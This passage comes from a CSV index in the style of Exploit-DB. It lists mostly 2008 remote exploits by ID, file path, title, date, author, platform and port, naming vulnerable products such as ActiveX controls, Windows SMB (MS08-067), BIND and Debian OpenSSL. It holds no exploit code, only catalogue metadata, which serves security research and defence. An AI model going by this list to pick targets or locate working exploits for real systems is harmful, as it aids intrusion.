Insecure Method",2008-01-29,darkl0rd,windows,remote, -5025,exploits/windows/remote/5025.html,"MySpace Uploader - 'MySpaceUploader.ocx 1.0.0.4' Remote Buffer Overflow",2008-01-31,Elazar,windows,remote, -5028,exploits/windows/remote/5028.html,"Chilkat FTP ActiveX 2.0 - 'ChilkatCert.dll' Insecure Method",2008-01-31,darkl0rd,windows,remote, -5045,exploits/windows/remote/5045.html,"Sejoong Namo ActiveSquare 6 - 'NamoInstaller.dll' ActiveX Buffer Overflow",2008-02-03,plan-s,windows,remote, -5046,exploits/windows/remote/5046.php,"Yahoo! Music Jukebox 2.2 - 'AddImage()' ActiveX Remote Buffer Overflow (1)",2008-02-03,anonymous,windows,remote, -5048,exploits/windows/remote/5048.html,"Yahoo! Music Jukebox 2.2 - 'AddImage()' ActiveX Remote Buffer Overflow (2)",2008-02-03,exceed,windows,remote, -5049,exploits/windows/remote/5049.html,"FaceBook PhotoUploader - 'ImageUploader4.ocx 4.5.57.0' Remote Buffer Overflow",2008-02-03,Elazar,windows,remote, -5051,exploits/windows/remote/5051.html,"Yahoo! Music JukeBox 2.2 - 'AddButton()' ActiveX Remote Buffer Overflow",2008-02-03,Elazar,windows,remote, -5052,exploits/windows/remote/5052.html,"Yahoo! JukeBox MediaGrid - 'AddBitmap()' ActiveX Buffer Overflow",2008-02-03,Elazar,windows,remote, -5069,exploits/windows/remote/5069.pl,"dBpowerAMP Audio Player 2 - '.m3u' Remote Buffer Overflow",2008-02-06,securfrog,windows,remote, -5078,exploits/windows/remote/5078.html,"Backup Exec System Recovery Manager 7.0.1 - Arbitrary File Upload",2008-02-07,titon,windows,remote, -5079,exploits/win_x86/remote/5079.c,"SapLPD 6.28 (Windows x86) - Remote Buffer Overflow",2008-02-07,BackBone,win_x86,remote,515 -5087,exploits/windows/remote/5087.html,"Microsoft DirectSpeechSynthesis Module - Remote Buffer Overflow",2008-02-09,rgod,windows,remote, -5100,exploits/windows/remote/5100.html,"ImageStation - 'SonyISUpload.cab' 1.0.0.38 ActiveX Buffer Overflow",2008-02-10,Elazar,windows,remote, -5102,exploits/windows/remote/5102.html,"FaceBook PhotoUploader 5.0.14.0 - Remote Buffer Overflow",2008-02-12,"MC Group Ltd.",windows,remote, -5106,exploits/windows/remote/5106.html,"Citrix Presentation Server Client - 'WFICA.OCX' ActiveX Heap Buffer Overflow",2008-02-12,Elazar,windows,remote, -5111,exploits/windows/remote/5111.html,"IBM Domino Web Access Upload Module - Overwrite (SEH)",2008-02-13,Elazar,windows,remote, -5113,exploits/hardware/remote/5113.txt,"Philips VOIP841 Firmware 1.0.4.800 - Multiple Vulnerabilities",2008-02-14,ikki,hardware,remote, -5150,exploits/hardware/remote/5150.txt,"Thecus N5200Pro NAS Server Control Panel - Remote File Inclusion",2008-02-18,Crackers_Child,hardware,remote, -5153,exploits/windows/remote/5153.asp,"Ourgame GLWorld 2.x - 'hgs_startNotify()' ActiveX Buffer Overflow",2008-02-19,luoluo,windows,remote, -5188,exploits/windows/remote/5188.html,"Rising AntiVirus Online Scanner - Insecure Method Flaw",2008-02-25,"John Smith",windows,remote, -5190,exploits/windows/remote/5190.html,"Move Networks Quantum Streaming Player Control - Remote Buffer Overflow",2008-02-26,Elazar,windows,remote, -5193,exploits/windows/remote/5193.html,"D-Link MPEG4 SHM Audio Control - 'VAPGDecoder.dll 1.7.0.5' Remote Buffer Overflow",2008-02-26,rgod,windows,remote, -5205,exploits/windows/remote/5205.html,"Symantec BackupExec Calendar Control - 'PVCalendar.ocx' Remote Buffer Overflow",2008-02-29,Elazar,windows,remote, -5212,exploits/windows/remote/5212.py,"MiniWebsvr 0.0.9a - Remote Directory Traversal",2008-03-03,gbr,windows,remote, -5213,exploits/windows/remote/5213.txt,"Versant Object Database 7.0.1.3 - Commands Execution",2008-03-04,"Luigi Auriemma",windows,remote, -5215,exploits/multiple/remote/5215.txt,"Ruby 1.8.6/1.9 (WEBick Httpd 1.3.1) - Directory Traversal",2008-03-06,DSecRG,multiple,remote, -5224,exploits/linux/remote/5224.php,"VHCS 2.4.7.1 - 'vhcs2_daemon' Remote Code Execution",2008-03-09,DarkFig,linux,remote, -5228,exploits/windows/remote/5228.txt,"acronis pxe server 2.0.0.1076 - Directory Traversal / Null Pointer",2008-03-10,"Luigi Auriemma",windows,remote, -5230,exploits/windows/remote/5230.txt,"argon client management services 1.31 - Directory Traversal",2008-03-10,"Luigi Auriemma",windows,remote, -5238,exploits/windows/remote/5238.py,"Motorola Timbuktu Pro 8.6.5/8.7 - Directory Traversal / Log Injection",2008-03-11,"Core Security",windows,remote, -5248,exploits/windows/remote/5248.py,"Alt-N MDaemon IMAP server 9.6.4 - 'FETCH' Remote Buffer Overflow",2008-03-13,ryujin,windows,remote,143 -5249,exploits/windows/remote/5249.pl,"MailEnable Professional/Enterprise 3.13 - 'Fetch' Authenticated Remote Buffer Overflow",2008-03-14,haluznik,windows,remote, -5257,exploits/multiple/remote/5257.py,"Dovecot IMAP 1.0.10 < 1.1rc2 - Remote Email Disclosure",2008-03-14,kingcope,multiple,remote, -5259,exploits/windows/remote/5259.py,"NetWin Surgemail 3.8k4-4 - IMAP Authenticated Remote LIST Universal",2008-03-14,ryujin,windows,remote,143 -5264,exploits/windows/remote/5264.html,"CA BrightStor ARCserve Backup r11.5 - ActiveX Remote Buffer Overflow",2008-03-16,h07,windows,remote, -5269,exploits/windows/remote/5269.txt,"MG-SOFT Net Inspector 6.5.0.828 - Multiple Vulnerabilities",2008-03-17,"Luigi Auriemma",windows,remote, -5282,exploits/solaris/remote/5282.txt,"Sun Solaris 10 - 'rpc.ypupdated' Remote Code Execution",2008-03-20,kingcope,solaris,remote, -5283,exploits/linux/remote/5283.txt,"CenterIM 4.22.3 - Remote Command Execution",2008-03-20,"Brian Fonfara",linux,remote, -5289,exploits/hardware/remote/5289.txt,"ZYXEL ZyWALL Quagga/Zebra - 'Default Password' Remote Code Execution",2008-03-21,"Pranav Joshi",hardware,remote, -5313,exploits/hardware/remote/5313.txt,"Linksys WRT54G Firmware 1.00.9 - Security Bypass (1)",2008-03-26,meathive,hardware,remote, -5314,exploits/windows/remote/5314.py,"TFTP Server 1.4 - ST Buffer Overflow",2008-03-26,muts,windows,remote,69 -5315,exploits/windows/remote/5315.py,"Quick TFTP Server Pro 2.1 - Remote Overflow (SEH)",2008-03-26,muts,windows,remote,69 -5330,exploits/win_x86/remote/5330.c,"Apache 2.0 mod_jk2 2.0.2 (Windows x86) - Remote Buffer Overflow",2008-03-31,Heretic2,win_x86,remote,80 -5332,exploits/windows/remote/5332.html,"Real Player - 'rmoc3260.dll' ActiveX Control Remote Code Execution",2008-04-01,Elazar,windows,remote, -5338,exploits/windows/remote/5338.html,"ChilkatHttp ActiveX 2.3 - Arbitrary Files Overwrite",2008-04-01,shinnai,windows,remote, -5342,exploits/windows/remote/5342.py,"HP OpenView Network Node Manager (OV NNM) 7.5.1 - 'OVAS.exe' Unauthenticated Overflow (SEH)",2008-04-02,muts,windows,remote,7510 -5366,exploits/solaris/remote/5366.rb,"Sun Solaris 10 - rpc.ypupdated Remote Code Execution (Metasploit)",2008-04-04,I)ruid,solaris,remote, -5386,exploits/linux/remote/5386.txt,"Apache Tomcat Connector jk2-2.0.2 mod_jk2 - Remote Overflow",2008-04-06,"INetCop Security",linux,remote,80 -5395,exploits/windows/remote/5395.html,"Data Dynamics ActiveBar (Actbar3.ocx 3.2) - Multiple Insecure Methods",2008-04-07,shinnai,windows,remote, -5397,exploits/windows/remote/5397.txt,"CDNetworks Nefficient Download - 'NeffyLauncher.dll' Code Execution",2008-04-07,"Simon Ryeo",windows,remote, -5398,exploits/windows/remote/5398.html,"Tumbleweed SecureTransport 4.6.1 FileTransfer - ActiveX Buffer Overflow",2008-04-07,"Patrick Webster",windows,remote, -5416,exploits/windows/remote/5416.html,"IBiz E-Banking Integrator 2.0 - ActiveX Edition Insecure Method",2008-04-09,shinnai,windows,remote, -5430,exploits/multiple/remote/5430.txt,"HP OpenView Network Node Manager 7.53 - Multiple Vulnerabilities",2008-04-11,"Luigi Auriemma",multiple,remote, -5445,exploits/windows/remote/5445.cpp,"HP OpenView Network Node Manager (OV NNM) 7.5.1 - 'ovalarmsrv.exe' Remote Overflow",2008-04-14,Heretic2,windows,remote,2954 -5451,exploits/windows/remote/5451.py,"BigAnt Server 2.2 - Unauthenticated Remote Overflow (SEH)",2008-04-15,ryujin,windows,remote,6080 -5461,exploits/windows/remote/5461.rb,"Intel Centrino ipw2200BG - Wireless Driver Remote Buffer Overflow (Metasploit)",2008-04-17,oveRet,windows,remote, -5489,exploits/windows/remote/5489.html,"Zune Software - ActiveX Arbitrary File Overwrite",2008-04-23,"ilion security",windows,remote, -5496,exploits/windows/remote/5496.html,"Watchfire Appscan 7.0 - ActiveX Multiple Insecure Methods",2008-04-25,callAX,windows,remote, -5511,exploits/windows/remote/5511.html,"HP Software Update - 'Hpufunction.dll 4.0.0.1' Insecure Method (PoC)",2008-04-27,callAX,windows,remote, -5519,exploits/windows/remote/5519.c,"VideoLAN VLC Media Player 0.8.6d - 'httpd_FileCallBack' Remote Format String",2008-04-28,EpiBite,windows,remote, -5530,exploits/windows/remote/5530.html,"Microsoft Works 7 - 'WkImgSrv.dll' ActiveX Remote Buffer Overflow",2008-05-02,lhoang8500,windows,remote, -5534,exploits/multiple/remote/5534.txt,"HLDS WebMod 0.48 - Multiple Remote Vulnerabilities",2008-05-03,"Luigi Auriemma",multiple,remote, -5536,exploits/windows/remote/5536.php,"HLDS WebMod 0.48 - 'rconpass' Remote Heap Overflow",2008-05-03,SkOd,windows,remote, -5563,exploits/windows/remote/5563.pl,"TFTP Server for Windows 1.4 - ST Remote BSS Overflow",2008-05-08,tixxDZ,windows,remote,69 -5612,exploits/windows/remote/5612.html,"idautomation bar code - ActiveX Multiple Vulnerabilities",2008-05-14,shinnai,windows,remote, -5619,exploits/windows/remote/5619.html,"Microsoft Internet Explorer - Print Table of Links Cross-Zone Scripting (PoC)",2008-05-14,"Aviv Raff",windows,remote, -5622,exploits/linux/remote/5622.txt,"OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH (Perl)",2008-05-15,"Markus Mueller",linux,remote,22 -5632,exploits/linux/remote/5632.rb,"OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH (Ruby)",2008-05-16,L4teral,linux,remote,22 -5681,exploits/windows/remote/5681.html,"Creative Software AutoUpdate Engine - ActiveX Stack Overflow",2008-05-27,BitKrush,windows,remote, -5694,exploits/windows/remote/5694.cpp,"ASUS DPC Proxy 2.0.0.16/19 - Remote Buffer Overflow",2008-05-29,Heretic2,windows,remote,623 -5695,exploits/windows/remote/5695.cpp,"Now SMS/Mms Gateway 5.5 - Remote Buffer Overflow",2008-05-29,Heretic2,windows,remote,8800 -5720,exploits/linux/remote/5720.py,"OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH (Python)",2008-06-01,"WarCat team",linux,remote,22 -5732,exploits/windows/remote/5732.html,"C6 Messenger - ActiveX Remote Download and Execute",2008-06-03,Nine:Situations:Group,windows,remote, -5738,exploits/windows/remote/5738.rb,"HP StorageWorks - NSI Double Take Remote Overflow (Metasploit)",2008-06-04,ri0t,windows,remote,1100 -5741,exploits/windows/remote/5741.html,"Akamai Download Manager < 2.2.3.7 - ActiveX Remote Download",2008-06-04,cocoruder,windows,remote, -5746,exploits/windows/remote/5746.html,"Black Ice Software Inc Barcode SDK - 'BITiff.ocx' Remote Buffer Overflow (1)",2008-06-05,shinnai,windows,remote, -5747,exploits/windows/remote/5747.html,"Black Ice Software Inc Barcode SDK - 'BITiff.ocx' Remote Buffer Overflow (2)",2008-06-05,shinnai,windows,remote, -5750,exploits/windows/remote/5750.html,"Black Ice Software Inc Barcode SDK - 'BIDIB.ocx' Multiple Vulnerabilities",2008-06-05,shinnai,windows,remote, -5751,exploits/windows/remote/5751.pl,"freeSSHd 1.2.1 - Authenticated Remote Overflow (SEH)",2008-06-06,ryujin,windows,remote,22 -5777,exploits/windows/remote/5777.html,"Black Ice Software Annotation Plugin - 'BiAnno.ocx' Remote Buffer Overflow",2008-06-10,shinnai,windows,remote, -5778,exploits/windows/remote/5778.html,"Black Ice Software Annotation Plugin - 'BiAnno.ocx' Remote Buffer Overflow (2)",2008-06-10,shinnai,windows,remote, -5790,exploits/multiple/remote/5790.txt,"SNMPv3 - HMAC Validation error Remote Authentication Bypass",2008-06-12,"Maurizio Agazzini",multiple,remote,161 -5793,exploits/windows/remote/5793.html,"muvee autoProducer 6.1 - 'TextOut.dll' ActiveX Remote Buffer Overflow",2008-06-12,Nine:Situations:Group,windows,remote, -5795,exploits/windows/remote/5795.html,"XChat 2.8.7b - 'URI Handler' Remote Code Execution (Internet Explorer 6/7)",2008-06-13,securfrog,windows,remote, -5827,exploits/windows/remote/5827.cpp,"Alt-N SecurityGateway 1.00-1.01 - Remote Stack Overflow",2008-06-15,Heretic2,windows,remote,4000 -5926,exploits/hardware/remote/5926.txt,"Linksys WRT54G Firmware 1.00.9 - Security Bypass (2)",2008-06-24,meathive,hardware,remote, -6004,exploits/windows/remote/6004.txt,"Panda Security ActiveScan 2.0 (Update) - Remote Buffer Overflow",2008-07-04,"Karol Wiesek",windows,remote, -6012,exploits/windows/remote/6012.php,"Youngzsoft CMailServer 5.4.6 - 'CMailCOM.dll' Remote Overwrite (SEH)",2008-07-06,Nine:Situations:Group,windows,remote,80 -6013,exploits/osx/remote/6013.pl,"Apple Safari / QuickTime 7.3 - RTSP Content-Type Remote Buffer Overflow",2008-07-06,krafty,osx,remote, -6045,exploits/linux/remote/6045.py,"Fonality trixbox 2.6.1 - 'langChoice' Remote Code Execution (Python)",2008-07-12,muts,linux,remote,80 -6089,exploits/windows/remote/6089.pl,"Bea Weblogic Apache Connector - Code Execution / Denial of Service",2008-07-17,kingcope,windows,remote,80 -6094,exploits/linux/remote/6094.txt,"Debian OpenSSH - Authenticated Remote SELinux Privilege Escalation",2008-07-17,eliteboy,linux,remote, -6100,exploits/win_x86/remote/6100.py,"Apache mod_jk 1.2.19 (Windows x86) - Remote Buffer Overflow",2008-07-18,Unohope,win_x86,remote,80 -6116,exploits/windows/remote/6116.pl,"IntelliTamper 2.0.7 - HTML Parser Remote Buffer Overflow",2008-07-22,"Guido Landi",windows,remote, -6118,exploits/windows/remote/6118.pl,"IntelliTamper 2.07 - server header Remote Code Execution",2008-07-22,Koshi,windows,remote, -6121,exploits/windows/remote/6121.c,"IntelliTamper 2.0.7 - HTML Parser Remote Buffer Overflow (C)",2008-07-23,r0ut3r,windows,remote, -6122,exploits/multiple/remote/6122.rb,"BIND 9.4.1 < 9.4.2 - Remote DNS Cache Poisoning (Metasploit)",2008-07-23,I)ruid,multiple,remote, -6123,exploits/multiple/remote/6123.py,"BIND 9.x - Remote DNS Cache Poisoning (Python)",2008-07-24,"Julien Desfossez",multiple,remote, -6124,exploits/windows/remote/6124.c,"Microsoft Access - 'Snapview.ocx 10.0.5529.0' ActiveX Remote File Download",2008-07-24,callAX,windows,remote, -6130,exploits/multiple/remote/6130.c,"BIND 9.x - Remote DNS Cache Poisoning",2008-07-25,"Marc Bevand",multiple,remote, -6151,exploits/windows/remote/6151.txt,"Velocity Web-Server 1.0 - Directory Traversal",2008-07-28,DSecRG,windows,remote, -6152,exploits/windows/remote/6152.html,"Trend Micro OfficeScan - ObjRemoveCtrl ActiveX Control Buffer Overflow",2008-07-28,Elazar,windows,remote, -6155,exploits/hardware/remote/6155.c,"Cisco IOS 12.3(18) (FTP Server) - Remote (Attached to GDB)",2008-07-29,"Andy Davis",hardware,remote, -6175,exploits/windows/remote/6175.html,"NCTsoft - 'AudFile.dll' ActiveX Control Remote Buffer Overflow",2008-07-31,shinnai,windows,remote, -6195,exploits/windows/remote/6195.c,"IntelliTamper 2.07 - 'imgsrc' Remote Buffer Overflow",2008-08-03,r0ut3r,windows,remote, -6217,exploits/windows/remote/6217.pl,"BlazeDVD 5.0 - '.PLF' Playlist File Remote Buffer Overflow",2008-08-10,LiquidWorm,windows,remote, -6220,exploits/windows/remote/6220.html,"Cisco WebEx Meeting Manager UCF - 'atucfobj.dll' ActiveX Remote Buffer Overflow",2008-08-10,"Guido Landi",windows,remote, -6227,exploits/windows/remote/6227.c,"IntelliTamper 2.07 - HTTP Header Remote Code Execution",2008-08-10,"Wojciech Pawlikowski",windows,remote, -6229,exploits/multiple/remote/6229.txt,"Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal (PoC)",2008-08-11,"Simon Ryeo",multiple,remote, -6236,exploits/multiple/remote/6236.txt,"BIND 9.5.0-P2 - 'Randomized Ports' Remote DNS Cache Poisoning",2008-08-13,Zbr,multiple,remote, -6238,exploits/windows/remote/6238.c,"IntelliTamper 2.07/2.08 Beta 4 - A HREF Remote Buffer Overflow",2008-08-13,kralor,windows,remote, -6248,exploits/windows/remote/6248.pl,"FlashGet 1.9.0.1012 - 'FTP PWD Response' SEH Stack Overflow",2008-08-15,SkOd,windows,remote,21 -6256,exploits/windows/remote/6256.pl,"FlashGet 1.9.0.1012 - 'FTP PWD Response' Remote Buffer Overflow (SafeSEH)",2008-08-17,"Guido Landi",windows,remote, -6278,exploits/windows/remote/6278.txt,"Anzio Web Print Object 3.2.30 - ActiveX Buffer Overflow",2008-08-20,"Core Security",windows,remote, -6302,exploits/windows/remote/6302.pl,"Dana IRC 1.4a - Remote Buffer Overflow",2008-08-25,"Guido Landi",windows,remote, -6305,exploits/hardware/remote/6305.html,"Belkin Wireless G Router / ADSL2 Modem - Authentication Bypass",2008-08-25,noensr,hardware,remote, -6317,exploits/windows/remote/6317.html,"Microsoft Visual Studio - 'Msmask32.ocx' ActiveX Remote Buffer Overflow",2008-08-26,Koshi,windows,remote, -6318,exploits/windows/remote/6318.html,"Ultra Shareware Office Control - ActiveX Control Remote Buffer Overflow",2008-08-27,shinnai,windows,remote, -6323,exploits/windows/remote/6323.html,"Friendly Technologies - 'fwRemoteCfg.dll' ActiveX Remote Buffer Overflow",2008-08-28,spdr,windows,remote, -6324,exploits/windows/remote/6324.html,"Friendly Technologies - 'fwRemoteCfg.dll' ActiveX Command Execution",2008-08-28,spdr,windows,remote, -6328,exploits/solaris/remote/6328.c,"Sun Solaris 10 - snoop(1M) Utility Remote Command Execution",2008-08-29,Andi,solaris,remote, -6334,exploits/windows/remote/6334.html,"Friendly Technologies - Read/Write Registry/Read Files",2008-08-30,spdr,windows,remote, -6355,exploits/windows/remote/6355.txt,"Google Chrome 0.2.149.27 - Automatic File Download",2008-09-03,nerex,windows,remote, -6366,exploits/hardware/remote/6366.c,"MicroTik RouterOS 3.13 - SNMP write (Set request) (PoC)",2008-09-05,ShadOS,hardware,remote, -6367,exploits/windows/remote/6367.txt,"Google Chrome 0.2.149.27 - 'SaveAs' Remote Buffer Overflow",2008-09-05,SVRT,windows,remote, -6387,exploits/windows/remote/6387.rb,"CitectSCADA ODBC Server - Remote Stack Buffer Overflow (Metasploit)",2008-09-05,"Kevin Finisterre",windows,remote,2022 -6407,exploits/windows/remote/6407.c,"Microworld Mailscan 5.6.a - Password Reveal",2008-09-09,SlaYeR,windows,remote, -6414,exploits/windows/remote/6414.html,"Peachtree Accounting 2004 - 'PAWWeb11.ocx' ActiveX Insecure Method",2008-09-10,"Jeremy Brown",windows,remote, -6454,exploits/windows/remote/6454.html,"Microsoft Windows Media Encoder (Windows XP SP2) - 'wmex.dll' ActiveX Buffer Overflow (MS08-053)",2008-09-13,haluznik,windows,remote, -6476,exploits/hardware/remote/6476.html,"Cisco Router - HTTP Administration Cross-Site Request Forgery / Command Execution (1)",2008-09-17,"Jeremy Brown",hardware,remote, -6477,exploits/hardware/remote/6477.html,"Cisco Router - HTTP Administration Cross-Site Request Forgery / Command Execution (2)",2008-09-17,"Jeremy Brown",hardware,remote, -6491,exploits/windows/remote/6491.html,"NuMedia Soft Nms DVD Burning SDK - ActiveX 'NMSDVDX.dll' Command Execution",2008-09-19,Nine:Situations:Group,windows,remote, -6506,exploits/windows/remote/6506.txt,"Unreal Tournament 3 1.3 - Directory Traversal",2008-09-21,"Luigi Auriemma",windows,remote, -6532,exploits/hardware/remote/6532.py,"Sagem F@ST Routers - DHCP Hostname Cross-Site Request Forgery",2008-09-22,Zigma,hardware,remote, -6537,exploits/windows/remote/6537.html,"Chilkat XML - ActiveX Arbitrary File Creation/Execution",2008-09-23,shinnai,windows,remote, -6548,exploits/windows/remote/6548.html,"BurnAware - NMSDVDXU ActiveX Arbitrary File Creation/Execution",2008-09-24,shinnai,windows,remote, -6570,exploits/windows/remote/6570.rb,"ICONICS Vessel / Gauge / Switch 8.02.140 - ActiveX Buffer Overflow (Metasploit)",2008-09-25,"Kevin Finisterre",windows,remote, -6600,exploits/windows/remote/6600.html,"Chilkat IMAP ActiveX 7.9 - File Execution / IE Denial of Service",2008-09-27,e.wiZz!,windows,remote, -6630,exploits/windows/remote/6630.html,"Autodesk DWF Viewer Control / LiveUpdate Module - Remote Code Execution",2008-09-30,Nine:Situations:Group,windows,remote, -6638,exploits/windows/remote/6638.html,"GdPicture Pro - ActiveX 'gdpicture4s.ocx' File Overwrite / Exec",2008-09-30,EgiX,windows,remote, -6656,exploits/windows/remote/6656.txt,"Microsoft Windows - GDI (EMR_COLORMATCHTOTARGETW) (MS08-021)",2008-10-02,Ac!dDrop,windows,remote, -6661,exploits/windows/remote/6661.txt,"Serv-U FTP Server 7.3 - Authenticated Remote FTP File Replacement",2008-10-03,dmnt,windows,remote, -6666,exploits/windows/remote/6666.pl,"mIRC 6.34 - Remote Buffer Overflow",2008-10-04,SkD,windows,remote, -6686,exploits/windows/remote/6686.txt,"Hammer Software MetaGauge 1.0.0.17 - Directory Traversal",2008-10-06,"Brad Antoniewicz",windows,remote, -6690,exploits/windows/remote/6690.html,"Skype Extension for Firefox Beta 2.2.0.95 - Clipboard Writing",2008-10-07,irk4z,windows,remote, -6699,exploits/windows/remote/6699.html,"Microsoft PicturePusher - ActiveX Cross-Site Arbitrary File Upload (PoC)",2008-10-08,Nine:Situations:Group,windows,remote, -6750,exploits/hardware/remote/6750.txt,"Telecom Italia Alice Pirelli routers - Backdoor from internal LAN/WAN",2008-10-14,"saxdax & drpepperONE",hardware,remote, -6773,exploits/windows/remote/6773.html,"Hummingbird Deployment Wizard 2008 - ActiveX Command Execution",2008-10-17,shinnai,windows,remote, -6774,exploits/windows/remote/6774.html,"Hummingbird Deployment Wizard 2008 - Registry Values Creation/Change",2008-10-17,shinnai,windows,remote, -6776,exploits/windows/remote/6776.html,"Hummingbird Deployment Wizard 2008 - ActiveX File Execution(2)",2008-10-17,shinnai,windows,remote, -6786,exploits/solaris/remote/6786.pl,"Solaris 9 (UltraSPARC) - 'sadmind' Remote Code Execution",2008-10-19,kingcope,solaris,remote,111 -6793,exploits/windows/remote/6793.html,"Dart Communications PowerTCP FTP module - Remote Buffer Overflow",2008-10-20,InTeL,windows,remote, -6801,exploits/windows/remote/6801.txt,"Opera 9.60 - Persistent Cross-Site Scripting",2008-10-22,"Roberto Suggi Liverani",windows,remote, -6804,exploits/windows/remote/6804.pl,"GoodTech SSH - 'SSH_FXP_OPEN' Remote Buffer Overflow",2008-10-22,r0ut3r,windows,remote,22 -6813,exploits/windows/remote/6813.html,"Opera 9.52/9.60 - Persistent Cross-Site Scripting Code Execution (PoC)",2008-10-23,"Aviv Raff",windows,remote, -6828,exploits/windows/remote/6828.html,"db Software Laboratory VImpX - 'VImpX.ocx' Multiple Vulnerabilities",2008-10-24,shinnai,windows,remote, -6840,exploits/windows/remote/6840.html,"PowerTCP FTP Module - Multiple Techniques (SEH HeapSpray)",2008-10-26,"Shahriyar Jalayeri",windows,remote, -6841,exploits/windows/remote/6841.txt,"Microsoft Windows Server - Universal Code Execution (MS08-067)",2008-10-26,EMM,windows,remote,135 -6870,exploits/windows/remote/6870.html,"MW6 Aztec - ActiveX 'Aztec.dll' Remote Insecure Method",2008-10-29,DeltahackingTEAM,windows,remote, -6871,exploits/windows/remote/6871.html,"MW6 Barcode - ActiveX 'Barcode.dll' Insecure Method",2008-10-29,DeltahackingTEAM,windows,remote, -6872,exploits/windows/remote/6872.html,"MW6 Datamatrix - ActiveX 'Datamatrix.dll' Insecure Method",2008-10-29,DeltahackingTEAM,windows,remote, -6873,exploits/windows/remote/6873.html,"MW6 PDF417 - ActiveX 'MW6PDF417.dll' Remote Insecure Method",2008-10-29,DeltahackingTEAM,windows,remote, -6875,exploits/windows/remote/6875.html,"Visagesoft eXPert PDF ViewerX - 'VSPDFViewerX.ocx' File Overwrite",2008-10-29,"Marco Torti",windows,remote, -6878,exploits/windows/remote/6878.html,"DjVu - ActiveX Control 3.0 ImageURL Property Overflow",2008-10-30,"Shahriyar Jalayeri",windows,remote, -6880,exploits/windows/remote/6880.html,"Opera 9.61 - 'opera:historysearch' Code Execution (PoC)",2008-10-30,"Aviv Raff",windows,remote, -6899,exploits/hardware/remote/6899.txt,"A-Link WL54AP3 / WL54AP2 - Cross-Site Request Forgery / Cross-Site Scripting",2008-10-31,"Henri Lindberg",hardware,remote, -6921,exploits/windows/remote/6921.rb,"GE Fanuc Real Time Information Portal 2.6 - 'writeFile()' API (Metasploit)",2008-11-01,"Kevin Finisterre",windows,remote, -6963,exploits/windows/remote/6963.html,"Chilkat Crypt - ActiveX Arbitrary File Creation/Execution (PoC)",2008-11-03,shinnai,windows,remote, -7055,exploits/hardware/remote/7055.txt,"SpeedStream 5200 - Authentication Bypass Configuration Download",2008-11-07,hkm,hardware,remote, -7056,exploits/windows/remote/7056.rb,"GE Proficy Real Time Information Portal - Credentials Leak Sniffer (Metasploit)",2008-11-08,"Kevin Finisterre",windows,remote, -7104,exploits/windows/remote/7104.c,"Microsoft Windows Server - Code Execution (MS08-067)",2008-11-12,Polymorphours,windows,remote,135 -7125,exploits/windows/remote/7125.txt,"Microsoft Windows - SmbRelay3 NTLM Replay (MS08-068)",2008-11-14,"Andres Tarasco",windows,remote, -7132,exploits/windows/remote/7132.py,"Microsoft Windows Server 2000/2003 - Code Execution (MS08-067)",2008-11-16,"Debasis Mohanty",windows,remote,445 -7142,exploits/windows/remote/7142.html,"Chilkat Socket ActiveX 2.3.1.1 - Arbitrary File Creation",2008-11-17,Zigma,windows,remote, -7145,exploits/windows/remote/7145.txt,"Exodus 0.10 - URI Handler Arbitrary Parameter Injection (1)",2008-11-17,Nine:Situations:Group,windows,remote, -7151,exploits/linux/remote/7151.c,"No-IP DUC 2.1.7 - Remote Code Execution",2008-11-18,XenoMuta,linux,remote, -7167,exploits/windows/remote/7167.html,"Exodus 0.10 - URI Handler Arbitrary Parameter Injection (2)",2008-11-20,Nine:Situations:Group,windows,remote, -7181,exploits/windows/remote/7181.html,"KVIrc 3.4.2 Shiny - URI handler Remote Command Execution",2008-11-21,Nine:Situations:Group,windows,remote, -7183,exploits/linux/remote/7183.txt,"verlihub 0.9.8d-RC2 - Remote Command Execution",2008-11-21,v4lkyrius,linux,remote, -7196,exploits/windows/remote/7196.html,"Microsoft XML Core Services DTD - Cross-Domain Scripting (PoC) (MS08-069)",2008-11-23,"Jerome Athias",windows,remote, -7355,exploits/windows/remote/7355.txt,"NULL FTP Server 1.1.0.7 - 'Site' Command Injection",2008-12-05,"Tan Chew Keong",windows,remote, -7384,exploits/windows/remote/7384.txt,"XAMPP 1.6.8 - Cross-Site Request Forgery (Change Administrative Password)",2008-12-08,"Michael Brooks",windows,remote, -7389,exploits/hardware/remote/7389.html,"DD-WRT v24-sp1 - Cross-Site Reference Forgery",2008-12-08,"Michael Brooks",hardware,remote, -7402,exploits/windows/remote/7402.html,"EasyMail - ActiveX 'emmailstore.dll 6.5.0.3' Remote Buffer Overflow",2008-12-09,e.wiZz!,windows,remote, -7403,exploits/windows/remote/7403.txt,"Microsoft Internet Explorer - XML Parsing Remote Buffer Overflow",2008-12-10,"Guido Landi",windows,remote, -7410,exploits/windows/remote/7410.html,"Microsoft Internet Explorer (Windows Vista) - XML Parsing Buffer Overflow",2008-12-10,muts,windows,remote, -7442,exploits/windows/remote/7442.txt,"TmaxSoft JEUS - Alternate Data Streams File Disclosure",2008-12-12,"Simon Ryeo",windows,remote, -7452,exploits/windows/remote/7452.pl,"ProSysInfo TFTP server TFTPDWIN 0.4.2 - Universal Remote Buffer Overflow",2008-12-14,SkD,windows,remote,69 -7477,exploits/windows/remote/7477.html,"Microsoft Internet Explorer - XML Parsing Buffer Overflow (1)",2008-12-15,krafty,windows,remote, -7496,exploits/hardware/remote/7496.txt,"Barracuda Spam Firewall 3.5.11.020 Model 600 - SQL Injection",2008-12-16,"Marian Ventuneac",hardware,remote, -7505,exploits/windows/remote/7505.html,"Phoenician Casino FlashAX - ActiveX Remote Code Execution",2008-12-17,e.wiZz!,windows,remote, -7521,exploits/windows/remote/7521.txt,"WebcamXP 5.3.2.375 - Remote File Disclosure",2008-12-19,nicx0,windows,remote, -7566,exploits/windows/remote/7566.html,"Google Chrome - 'ChromeHTML://' Remote Parameter Injection",2008-12-23,Nine:Situations:Group,windows,remote, -7583,exploits/windows/remote/7583.pl,"Microsoft Internet Explorer - XML Parsing Buffer Overflow (2)",2008-12-28,"Jeremy Brown",windows,remote, -7584,exploits/windows/remote/7584.pl,"Amaya Web Browser 11.0.1 (Windows Vista) - Remote Buffer Overflow",2008-12-28,SkD,windows,remote, -7594,exploits/windows/remote/7594.html,"Chilkat FTP - ActiveX (SaveLastError) Insecure Method",2008-12-28,callAX,windows,remote, -7617,exploits/windows/remote/7617.html,"SasCam WebCam Server 2.6.5 - ActiveX Remote Buffer 